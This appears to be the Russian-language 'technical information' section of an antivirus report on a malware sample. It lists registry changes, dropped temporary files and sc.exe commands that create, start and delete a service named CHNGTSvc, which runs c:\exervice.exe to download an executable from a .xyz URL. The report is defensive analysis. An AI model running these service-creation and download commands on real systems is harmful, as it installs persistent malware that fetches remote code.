Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\CHNGTSvc] 'ImagePath' = 'c:\exervice.exe http://cloudfront.1e072b3360ec828ac7efbd22c247e34f2751568d.xyz/download/xpack1011_RU.1476196077.exe'
- '<SYSTEM32>\sc.exe' create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####2b3360ec828ac7efbd22c247e34f2751568d.xyz/download/xpack1011_RU.1476196077.exe"
- '%TEMP%\nst2.tmp\ns5.tmp' sc start CHNGTSvc
- '<SYSTEM32>\sc.exe' start CHNGTSvc
- '%TEMP%\nst2.tmp\ns3.tmp' sc delete CHNGTSvc
- '<SYSTEM32>\sc.exe' delete CHNGTSvc
- '%TEMP%\nst2.tmp\ns4.tmp' sc create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####2b3360ec828ac7efbd22c247e34f2751568d.xyz/download/xpack1011_RU.1476196077.exe"
- %TEMP%\nst2.tmp\ns4.tmp
- %TEMP%\nst2.tmp\ns5.tmp
- %TEMP%\nst2.tmp\ns3.tmp
- C:\exervice.exe
- %TEMP%\nst2.tmp\nsExec.dll
- %TEMP%\nst2.tmp\ns4.tmp
- %TEMP%\nst2.tmp\ns3.tmp